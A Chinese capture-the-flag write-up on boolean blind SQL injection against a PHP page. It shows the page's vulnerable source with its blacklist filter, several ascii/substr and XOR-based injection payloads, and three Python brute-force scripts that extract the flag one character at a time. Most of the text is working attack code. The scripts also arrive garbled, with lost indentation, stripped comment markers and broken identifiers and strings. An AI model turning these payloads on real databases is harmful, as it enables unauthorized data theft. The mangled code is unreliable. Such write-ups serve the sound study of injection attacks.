知识点:题目已经告知列名和表明为flag,接下来利用ascii和substr函数即可进行bool盲注
eg:
id=(ascii(substr((select(flag)from(flag)),1,1))<128)
0x01
看了网上的源码发现:
<?php
$dbuser='root';
$dbpass='root';
function safe($sql){
#被过滤的内容 函数基本没过滤
$blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
foreach($blackList as $blackitem){
if(stripos($sql,$blackitem)){
return False; } } return True;
} i
f(isset($_POST['id'])){
$id = $_POST['id'];
}else
{ die();
}
$db = mysql_connect("localhost",$dbuser,$dbpass); i
f(!$db){
die(mysql_error()); }
mysql_select_db("ctf",$db);
if(safe($id)){
$query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");
if($query){
$result = mysql_fetch_array($query);
if($result){
echo $result['content'];
}else{
echo "Error Occured When Fetch Result.";
}
}else{
var_dump($query);
} }else{
die("SQL Injection Checked."); }
过滤了一堆东西,可以看到很多函数没有过滤,
接下来就想办法借助函数构造注入就可以了。
借助substr函数截取flag中的内容,长度依次增加。用if函数判断截取出来的内容是什么,这里需要穷举。如果判断成功,返回1,否则返回2。
0x2解题
贴上wp脚本
import requests
import time
url是随时更新的,具体的以做题时候的为准
url = 'http://40c9be7a-36f0-4e80-94ca-d1ac9e121947.node1.buuoj.cn/index.php'
data = {"id":""}
flag = 'flag{'
i = 6
while True:
从可打印字符开始
begin = 32
end = 126
tmp = (begin+end)//2
while begin<end:
print(begin,tmp,end)
time.sleep(1)
data["id"] = "if(ascii(substr((select flag from flag),{},1))>{},1,2)".format(i,tmp)
r = requests.post(url,data=data)
if 'Hello' in r.text:
begin = tmp+1
tmp = (begin+end)//2
else:
end = tmp
tmp = (begin+end)//2
flag+=chr(tmp)
print(flag)
i+=1
if flag[-1]=='}':
break
0x03 解法二
看的网上的wp还有一种解法是通过异或
在爆flag的时候发现有过滤 :select,show,""……很是难受,后来在师傅的博客上看到了这种方法:
id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
附上脚本爆破
#!/usr/bin/python
#-*-coding:utf-8 -*-
import requests
import re
def flag_get(start,f,url): #确定start位的字符
a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))='+str(f)+'),0,1))'
data = {'id': a }
url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'
r= requests.post(url, data)
s=r.text
#print(s)
if 'Hello' in s:
return 1
else:
return 0
def flag_find(start,f,url): #确定
a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))>'+str(f)+'),0,1))'
data = {'id': a }
url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'
r= requests.post(url, data)
s=r.text
#print(s)
if 'Hello' in s:
return 1
else:
return 0
if __name__ == '__main__':
url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'
flag_kouhao=125
flag=''
num=1 #从第num位开始爆破
while 1:
start=32 #ascii的起始范围(10进制)
last=126 #ascii的终止范围(10进制)
mid=int((start+last)/2)
while 1:
if(flag_get(num,flag_kouhao,url)):
flag=flag+'}'
print('flag is :'+flag)
exit(1)
print('strat is '+str(start))
print(' mid is '+str(mid))
print('last is '+str(last))
print('****************************************')
if(flag_find(num,mid,url)):
start=mid
mid=int((start+last)/2)
if ((last-start)<5):
break
else:
last=mid
mid=int((start+last)/2)
if ((last-start)<5):
break
print(start)
print(last)
print('****************************************')
for i in range(start,last+1):
print(i)
if(flag_get(num,i,url)):
f=chr(i)
flag=flag+f
print('****************************************')
print(' num is '+str(num))
print('char is '+f)
print('flag is '+flag)
print('****************************************')
break
num=num+1
print(flag)
exp2:
coding:utf-8
import requests
from lxml import etree
def a():
url="http://b995ff2b-d867-4580-80c2-3fd1e4b25cb4.node3.buuoj.cn/"
flag="Hello, glzjin wants a girlfriend."
final=""
stop=0
for i in range(1,1290):
print(""50,i,""50)
stop=0
for j in range(32,129):
stop = j
data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)}
re = requests.post(url=url,data=data).text.replace('
','')
html = etree.HTML(re).xpath("//text()")
# print(">>",html)
if flag in html:
final+=chr(j)
print("
",final)
break
if stop >= 128:
print("*"*50,"结束")
print(">>",final)
break
if name == 'main':
a()
参考链接
https://www.cnblogs.com/kevinbruce656/p/11342580.html
https://blog.csdn.net/weixin_43345082/article/details/99062970